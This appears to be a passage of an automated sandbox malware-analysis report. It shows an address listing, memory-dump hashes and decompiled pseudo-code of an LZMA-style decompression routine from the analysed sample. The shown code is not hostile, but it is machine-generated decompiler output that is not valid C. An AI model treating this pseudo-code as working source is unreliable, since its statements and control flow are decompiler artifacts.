                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x0040623d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00000000
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x004068bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x004068c2
                                                  0x004068bc
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x004068bc
                                                  0x00406843
                                                  0x00406840
                                                  0x00000000
                                                  0x00406477

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                  • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                                  • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                  • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406591, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406591() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
